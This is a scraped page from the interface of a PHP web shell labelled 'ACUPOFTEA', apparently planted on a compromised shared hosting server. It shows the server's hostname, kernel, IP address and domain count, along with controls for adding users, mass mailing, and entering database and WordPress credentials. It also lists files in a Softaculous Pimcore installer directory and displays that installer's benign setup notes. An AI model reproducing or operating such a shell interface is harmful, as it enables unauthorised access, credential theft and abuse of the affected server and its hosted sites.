System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
pimcore
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
notes.txt
##### Before starting manual installation make the following changes in config/config.yaml for session handler. #### session: # handler_id: null gc_probability: null ####### Install all the bundles in manual ########## 1. PHP REQUIREMENT LINK : https://docs.pimcore.com/platform/Pimcore/Installation_and_Upgrade/System_Requirements 2. Install using composer and make zip, remove extra files eg. 1.config/services.yaml 2.config/local/database.yaml 3.var/* (except 'config' folder which has 'web-to-print' folder and 'web_to_print.yaml' file) 4.public/var 5.Keep APP_ENV as prod in .env file in our package. Check and move public/bundles from manual to our zip. and keep public/.htaccess file from manual for apache environment. https://docs.pimcore.com/platform/Pimcore/Installation_and_Upgrade/System_Setup_and_Hosting/Apache_Configuration 3. Follow installation steps mentioned in the link below, use the skeleton package to install via composer: composer create-project pimcore/skeleton my-project https://pimcore.com/docs/platform/Pimcore/Getting_Started/Installation/Webserver_Installation 4. Use utf8mb4_general_ci collate for database while manual installation otherwise command throws error. 5. Check "pimcore/pimcore" version in composer.json of "pimcore/skeleton" and download that version of "pimcore/pimcore" and check "lib/too/requirements.php" if requirements verfication code is changed in "checkMysql" function then change requirements code accordingly. 6. Don't remove double quotes from "[[softdbpass]]" it throws error when contain "[" and "]". 7. Remove "DEFINER=`root`@`localhost`" From sql file. 8. Remove COLLATE=utf8mb4_0900_ai_ci From sql file if we have installed manually on Mysql 8. Because it gives error on installing with MariaDB. Besides this script itself doesn't use any collation and hence it takes server's default collation. https://github.com/pimcore/pimcore/blob/34d4734eafbb18bf91320452ecd7846c29c37c0f/bundles/InstallBundle/Resources/install.sql#L45 9. We have added redirection rule from public/.htaccess to our .htaccess to resolve image url issue. update when there is change. # ASSETS: check if request method is GET (because of WebDAV) and if the requested file (asset) exists on the filesystem, if both match, deliver the asset directly RewriteCond %{REQUEST_METHOD} ^(GET|HEAD) RewriteCond [[softpath]]/public/var/assets%{REQUEST_URI} -f RewriteRule ^(.*)$ /var/assets%{REQUEST_URI} [PT,L] # Thumbnails RewriteCond %{REQUEST_URI} .*/(image|video)-thumb__[\d]+__.* RewriteCond [[softpath]]/public/var/tmp/thumbnails%{REQUEST_URI} -f RewriteRule ^(.*)$ /var/tmp/thumbnails%{REQUEST_URI} [PT,L] # static pages RewriteCond %{REQUEST_METHOD} ^(GET|HEAD) RewriteCond %{QUERY_STRING} !(pimcore_editmode=true|pimcore_preview|pimcore_version) RewriteCond [[softpath]]/public/var/tmp/pages%{REQUEST_URI}.html -f RewriteRule ^(.*)$ /var/tmp/pages%{REQUEST_URI}.html [PT,L] 10. works only on apache as we have added apache code in public/.htaccess 11. We have disabled the script on ampps because we configure the .htaccess which has RewriteCond rules which is not compatible with ampps. 12. Take sql dump after cli install is complete(On 'Pimcore was successfully installed). as dumping sql on login page, adds some extra inserts in sql in `translations_admin` table. 13. Since 11.3.0 version, to download the package using composer the script requires "amqp" extension to fetch some dependency which is installed on cpanel. Check in next version if it is still required to download the package, download the package on cpanel and install it manually on any server. (on w1 amqp extension is installed)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
..
DIR
-
drwxr-xr-x
2025-12-16 09:39:04
images
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
php53
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
php56
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
php71
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
php81
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
php82
DIR
-
drwxr-xr-x
2025-03-13 09:51:28
.htaccess
text/plain
840 B
-rw-r--r--
2022-02-18 06:03:20
bundles.php
text/x-php
124 B
-rw-r--r--
2024-12-11 04:48:38
config.yaml
text/plain
4.03 KB
-rw-r--r--
2024-12-11 04:48:38
database.yaml
text/plain
235 B
-rw-r--r--
2021-12-23 05:18:42
edit.php
text/x-php
4.45 KB
-rw-r--r--
2025-03-12 08:41:44
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 05:18:42
extend.php
text/x-php
10.28 KB
-rw-r--r--
2025-03-12 08:41:44
fileindex.php
text/plain
291 B
-rw-r--r--
2024-12-11 04:48:38
import.php
text/x-php
4.46 KB
-rw-r--r--
2025-03-12 08:41:44
info.xml
text/html
3.65 KB
-rw-r--r--
2025-03-12 04:30:02
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 05:18:42
install.php
text/x-php
10.05 KB
-rw-r--r--
2025-03-12 08:41:44
install.xml
text/html
627 B
-rw-r--r--
2021-12-23 05:18:42
md5
text/plain
14.71 KB
-rw-r--r--
2025-03-12 08:41:44
notes.txt
text/plain
3.6 KB
-rw-r--r--
2025-03-12 04:30:02
services.yaml
text/x-c++
2.82 KB
-rw-r--r--
2021-12-23 05:18:42
update_pass.php
text/x-php
499 B
-rw-r--r--
2021-12-23 05:18:42
~ ACUPOFTEA - accounting.gulfstore-gcc.com